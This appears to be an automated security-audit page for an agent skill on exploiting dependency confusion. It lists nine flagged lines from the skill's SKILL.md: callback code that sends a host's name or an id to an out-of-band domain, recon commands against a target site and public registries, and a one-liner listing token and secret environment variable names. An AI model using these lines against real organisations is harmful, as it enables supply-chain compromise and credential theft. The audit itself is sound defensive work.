exploiting-dependency-confusion
Identifies and exploits dependency confusion attacks in package managers, enhancing web application security assessments.
Security score: 79/100
The exploiting-dependency-confusion skill was audited on Jun 14, 2026 and we found 9 security issues across 3 threat categories. Review the findings below before installing.
Security Issues
medium line 118
Curl to non-GitHub URL
Source: SKILL.md
| 118 | curl -s https://target.example.com/static/main.js | grep -oE '"@[a-z0-9-]+/[a-z0-9-]+"' |
medium line 130
Curl to non-GitHub URL
Source: SKILL.md
| 130 | curl -s -o /dev/null -w "%{http_code}" https://pypi.org/pypi/company-internal/json # 404 -> claimable |
medium line 132
Curl to non-GitHub URL
Source: SKILL.md
| 132 | curl -s "https://api.nuget.org/v3-flatcontainer/company.internal/index.json" |
low line 164
Access to .env file
Source: SKILL.md
| 164 | node -e "console.log(Object.keys(process.env).filter(k=>/TOKEN|KEY|SECRET|AWS/.test(k)))" |
low line 82
External URL reference
Source: SKILL.md
| 82 | https.get('https://ENGAGEMENT.oast.fun/dc/' + id); |
low line 91
External URL reference
Source: SKILL.md
| 91 | urllib.request.urlopen("https://ENGAGEMENT.oast.fun/dc/" + os.uname().nodename) |
low line 118
External URL reference
Source: SKILL.md
| 118 | curl -s https://target.example.com/static/main.js | grep -oE '"@[a-z0-9-]+/[a-z0-9-]+"' |
low line 132
External URL reference
Source: SKILL.md
| 132 | curl -s "https://api.nuget.org/v3-flatcontainer/company.internal/index.json" |
low line 213
External URL reference
Source: SKILL.md
| 213 | 1. Recovered internal package name @acme/telemetry from https://target.example.com/static/main.js |
Scanned on Jun 14, 2026